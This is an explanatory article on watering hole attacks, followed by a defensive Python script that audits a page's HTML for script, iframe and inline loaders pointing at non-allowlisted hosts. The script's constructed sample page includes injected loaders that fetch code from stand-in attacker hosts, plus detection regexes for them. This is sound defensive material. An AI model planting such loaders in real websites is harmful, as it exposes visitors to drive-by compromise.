What is a watering hole attack?

Most hacks start with the victim making a mistake, whether it is entering a password on a convincing-looking phishing page or accidentally downloading a malicious attachment on a work computer. But one particularly insidious technique starts with nothing more than visiting a legitimate website. These are called watering hole attacks, and in addition to being a long-standing threat, they have been behind a number of recent high-profile incidents.

The most notorious watering hole attack in recent memory came to light in 2019, when it emerged that iPhone users in China’s Uighur Muslim community had been targeted for two years. But threat intelligence researchers emphasize that the technique is quite common, precisely because it is so powerful and effective. Internet security firm ESET says it detects multiple watering hole attacks each year, and Google’s Threat Analysis Group (TAG) similarly sees more than one every month.

The name comes from the idea of poisoning a central water source, which in turn affects everyone who drinks from it. Relatedly, it also evokes a predator lurking near a watering hole, waiting for prey to stop by. Watering hole attacks can be difficult to detect because they often operate silently on legitimate websites whose owners may not notice anything amiss. And even once an attack is discovered, it is often unclear how long it has been running and how many victims there are.

“Let’s say the attackers are going after the Democrats. They can hack the Democrats’ website knowing that they are going to reach all their possible targets there,” said Shane Huntley, director of Google TAG. “The important thing about this, and why these attacks are so dangerous and can lead to such a high success rate, is that they take that step out of the way. Instead of targeting them with something they actually have to click on, which can be difficult because they are so clever, you can go to a place where they are already going and skip straight to the part where you are actually exploiting people’s devices.”

Earlier this month, for example, TAG published findings on a watering hole attack that compromised the websites of media outlets and pro-democracy political groups in Hong Kong in order to target visitors using Macs and iPhones. Based on the evidence it was able to gather, TAG could not say conclusively how long the attacks lasted or how many devices were affected.

There are always two types of victims in a watering hole attack: the legitimate website or service that the attackers compromise in order to embed their malicious infrastructure, and the users who are then compromised when they visit it. Attackers have become increasingly adept at minimizing their footprint, using the compromised website or service merely as a conduit between victims and external malicious infrastructure, so that users see no clear indication that anything is wrong. That way, attackers don’t have to build everything within the compromised site. Conveniently for hackers, this makes the attacks easier to set up and harder to trace.

To turn a website visit into an actual hack, attackers must be able to exploit software flaws on victims’ devices, often a chain of vulnerabilities that starts with a browser bug. This gives attackers the access they need to install spyware or other malicious software. If hackers want to cast a wide net, they have to build out their infrastructure to exploit as many device types and software versions as possible. Researchers point out, though, that while watering hole attacks may appear indiscriminate, hackers can target victims more precisely using the device type or other information the browser reveals, such as which country their IP address comes from.
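The two preceding paragraphs describe the mechanics a site owner can actually look for: the compromised page itself carries little more than a loader that pulls the exploit chain from attacker-controlled infrastructure, typically an injected script tag, a hidden iframe, or a small inline script that creates one of those at runtime. The following is an added example, not code from the article or from any of the organizations it mentions, of a simple page audit that parses HTML and flags every loader pointing at an origin outside an allowlist the owner maintains. The sample page, the allowlist and the hostnames under the reserved `.invalid` domain are all constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page: the site's own assets, one legitimate CDN and one
# legitimate embed, plus three injected loaders pointing at hypothetical
# attacker-controlled hosts (a protocol-relative script, a hidden iframe and
# an inline script that creates a script element at runtime).
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.jsdelivr.net/npm/vue@3"></script>
<script src="//stats.example-cdn.invalid/t.js"></script>
</head><body>
<p>Latest news</p>
<iframe src="https://legit-embed.example.org/video"></iframe>
<iframe src="https://update-check.example.invalid/x" style="display:none"></iframe>
<script>var s=document.createElement('script');s.src='https://loader.example.invalid/f.js';document.head.appendChild(s);</script>
</body></html>"""

# Origins the site owner knows should appear in the page (assumed allowlist).
ALLOWED_ORIGINS = {"cdn.jsdelivr.net", "legit-embed.example.org"}

# Tags that load remote content, and the attribute holding the URL.
LOADER_ATTRS = {"script": "src", "iframe": "src", "embed": "src", "object": "data"}
# Inline code that builds a loader element at runtime is worth a closer look.
DYNAMIC_LOADER_RE = re.compile(r"""createElement\(\s*['"](script|iframe)['"]\s*\)""", re.I)
# Absolute or protocol-relative URLs inside inline script text.
URL_RE = re.compile(r"""(?:https?:)?//([A-Za-z0-9.-]+)""")


class LoaderCollector(HTMLParser):
    """Collect static loader URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.static = []          # list of (tag, url)
        self.inline_scripts = []  # raw inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        attr = LOADER_ATTRS.get(tag)
        if attr and a.get(attr):
            self.static.append((tag, a[attr]))
        if tag == "script" and not a.get("src"):
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline_scripts.append("".join(self._buf))


def origin_of(url):
    """Host of an absolute or protocol-relative URL; None for same-origin paths."""
    if url.startswith("//"):
        url = "https:" + url
    host = urlsplit(url).hostname
    return host.lower() if host else None


def find_external_loaders(html, allowed_origins):
    """Return every remote loader in the page whose host is not allowlisted."""
    parser = LoaderCollector()
    parser.feed(html)
    findings = []
    for tag, url in parser.static:
        host = origin_of(url)
        if host and host not in allowed_origins:
            findings.append({"kind": tag, "host": host, "url": url})
    for body in parser.inline_scripts:
        if DYNAMIC_LOADER_RE.search(body):
            for m in URL_RE.finditer(body):
                host = m.group(1).lower()
                if host not in allowed_origins:
                    findings.append({"kind": "inline-loader", "host": host, "url": m.group(0)})
    return findings


if __name__ == "__main__":
    for f in find_external_loaders(SAMPLE_HTML, ALLOWED_ORIGINS):
        print(f"{f['kind']:14} {f['host']:30} {f['url']}")
```

One caveat follows directly from the article's point about targeting: because the loader can be served only to visitors whose device type, language or IP geolocation match the attacker's criteria, a scanner fetching the page from a data-center IP with a generic user agent may receive the clean version. Run the audit against what real visitors receive (from saved browser sessions or a representative client), and treat a clean result from a single vantage point as weak evidence.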